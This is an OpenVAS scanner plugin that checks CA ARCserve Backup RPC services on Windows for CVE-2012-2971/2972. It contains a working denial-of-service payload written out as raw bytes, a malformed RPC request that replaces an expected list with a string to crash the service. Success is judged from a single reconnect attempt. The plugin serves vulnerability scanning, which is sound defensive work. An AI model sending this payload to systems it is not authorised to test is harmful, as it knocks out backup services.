openvas · Copyright (C) 2012 Greenbone AG · OPENVAS:1361412562310802677
History: Nov 20, 2012 - 12:00 a.m.

CA ARCserve Backup RPC Services Multiple Vulnerabilities - Windows

2012-11-20 00:00:00
Copyright (C) 2012 Greenbone AG
plugins.openvas.org
9

6.4 Medium

AI Score

Confidence

Low

0.678 Medium

EPSS

Percentile

98.0%

CA ARCserve Backup is prone to multiple vulnerabilities.

# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

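# Registration block: when the scanner loads the plugin with `description` set,
# only the metadata below is recorded and the script exits (see exit(0) at the
# end of the block) before any network traffic is generated.
if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.802677");
  script_version("2023-09-08T05:06:21+0000");
  script_cve_id("CVE-2012-2971", "CVE-2012-2972");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"2023-09-08 05:06:21 +0000 (Fri, 08 Sep 2023)");
  script_tag(name:"creation_date", value:"2012-11-20 11:04:50 +0530 (Tue, 20 Nov 2012)");
  script_name("CA ARCserve Backup RPC Services Multiple Vulnerabilities - Windows");
  # ACT_DENIAL: the check below is intrusive. It sends a request intended to
  # stop the service and decides from whether the port still accepts
  # connections afterwards. Scanners normally skip this category when safe
  # checks are enabled, so schedule it only against hosts where an outage of
  # the backup service is acceptable.
  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2012 Greenbone AG");
  script_family("Denial of Service");
  # Only run once a TCP portmapper has been detected and the host has been
  # fingerprinted as Windows by the two dependency scripts.
  script_dependencies("gb_rpc_portmap_tcp_detect.nasl", "os_detection.nasl");
  script_mandatory_keys("rpc/portmap/tcp/detected", "Host/runs_windows");

  script_xref(name:"URL", value:"http://secunia.com/advisories/51012/");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/56116");
  script_xref(name:"URL", value:"http://www.offensive-security.com/vulndev/ca-arcserve-rwslist-remote-code-execution/");
  script_xref(name:"URL", value:"https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={F9EEA31E-8089-423E-B746-41B5C9DD2AC1}");

  # The report text previously read "will remote attackers"; the missing verb
  # is restored so the impact statement shown to operators is readable.
  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to execute arbitrary code or
  cause a denial of service condition.");

  script_tag(name:"affected", value:"CA ARCserve Backup for Windows r12.5, r15, r16.");

  script_tag(name:"insight", value:"The flaws are due to an error in the RPC service, which fails to validate
  user supplied crafted input.");

  script_tag(name:"solution", value:"Apply the patch from the referenced advisory.");

  script_tag(name:"summary", value:"CA ARCserve Backup is prone to multiple vulnerabilities.");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}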

include("rpc.inc");
include("http_func.inc");
include("host_details.inc");
include("byte_func.inc");

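# ONC RPC program number of the portmapper (100000), used to locate it on TCP.
RPC_PROG = "100000";

port = rpc_get_port(program: RPC_PROG, protocol: IPPROTO_TCP);

if(port)
{
  # authentication service port request
  #
  # Layout of the bytes below (ONC RPC over TCP):
  #   80 00 00 38   record marker: last fragment, 56 bytes follow
  #   4f 9d b4 b2   transaction id
  #   00 00 00 00   message type 0 (call)
  #   00 00 00 02   RPC version 2
  #   00 01 86 a0   program 100000 (portmapper), then version 2, procedure 3 (GETPORT)
  #   4 x 00000000  empty credential and verifier
  #   00 06 09 80   program being looked up (0x00060980), then version 1,
  #                 protocol 6 (TCP), port 0
  req_getport = raw_string(
  0x80, 0x00, 0x00, 0x38, 0x4f, 0x9d, 0xb4, 0xb2, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x02, 0x00, 0x01, 0x86, 0xa0, 0x00, 0x00, 0x00, 0x02,
  0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x09, 0x80,
  0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00);

  soc = open_sock_tcp(port);

  # The connect can fail (filtered port, portmapper gone since detection);
  # without a socket there is nothing to query, so stop without a finding.
  if(!soc){
    exit(0);
  }

  send(socket:soc, data:req_getport);
  res = recv(socket:soc, length:100);
  close(soc);

  if(isnull(res)){
    exit(0);
  }

  reslen = strlen(res);

  # The port is read from the tail of the reply. An empty or truncated reply
  # would make the indexes below negative, so require at least the 4-byte
  # port field before parsing.
  if(reslen < 4){
    exit(0);
  }

  # authentication service port number
  # (low 16 bits of the trailing 32-bit port field)
  authport = hex2dec(xvalue:hexstr(res[reslen-2])+hexstr(res[reslen-1]));

  # A portmapper answers GETPORT with port 0 when the program is not
  # registered; in that case the service is not present and nothing is sent.
  if(!authport){
    exit(0);
  }

  # dos request
  # The byte sequence is kept exactly as published in the plugin.
  dos = raw_string(
  0x80, 0x00, 0x02, 0x68, 0x4f, 0x9d, 0x17, 0x25, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x02, 0x00, 0x06, 0x09, 0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
  0x00, 0x7a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa1, 0x02, 0x35, 0x32, 0x35,
  0x34, 0x30, 0x30, 0x30, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x41,
  0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x32, 0x30, 0x30, 0x30, 0x30, 0x30,
  0x30, 0x31) +  crap(data:raw_string(0x30), length:98) + raw_string(
  0x34, 0x45, 0x38, 0x44, 0x44, 0x31, 0x36, 0x34, 0x44, 0x33, 0x41, 0x37, 0x31,
  0x42, 0x39, 0x43, 0x36, 0x46, 0x34, 0x43, 0x46, 0x42, 0x41, 0x42, 0x34, 0x32,
  0x35, 0x35, 0x42, 0x44, 0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb1, 0x02,
  0x35, 0x32, 0x35, 0x34, 0x30, 0x30, 0x30, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30,
  0x30, 0x30, 0x41, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x32, 0x30, 0x30,
  0x30, 0x30, 0x30, 0x30, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30) +
  crap(data:raw_string(0x30), length:89) + raw_string (
  0x46, 0x30, 0x38, 0x30, 0x31, 0x43, 0x42, 0x41, 0x37, 0x38, 0x37, 0x36, 0x44,
  0x46, 0x30, 0x45, 0x44, 0x41, 0x44, 0x31, 0x36, 0x44, 0x43, 0x38, 0x36, 0x36,
  0x38, 0x39, 0x37, 0x33, 0x43, 0x31, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41,
  ## xdr_list was expected here, we replace it with
  ## an xdr_string to trigger the bug
  0x00, 0x00, 0x00, 0x06, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x00,
  ## string
  0x00, 0x00, 0x00, 0x17, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x00);

  soc2 = open_sock_tcp(authport);

  if(soc2)
  {
    send(socket:soc2, data:dos);
    # The reply is not inspected; the read only gives the service time to
    # process the request before the connection is closed.
    res = recv(socket:soc2, length:100);
    close(soc2);

    # Wait, then probe the same port again. The verdict rests on a single
    # reconnect attempt, so a transient network fault or a filter that starts
    # dropping traffic would look the same as a crashed service: confirm a
    # finding on the host itself before acting on it.
    sleep(15);
    soc3 = open_sock_tcp(authport);

    if(!soc3)
    {
      # A finding here means the service stopped accepting connections during
      # the scan and probably has to be restarted on the target.
      # NOTE(review): the result is reported against the portmapper port, not
      # authport where the service was probed; confirm this is intended.
      security_message(port:port, protocol:"tcp");
      exit(0);
    }
    close(soc3);
  }
}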
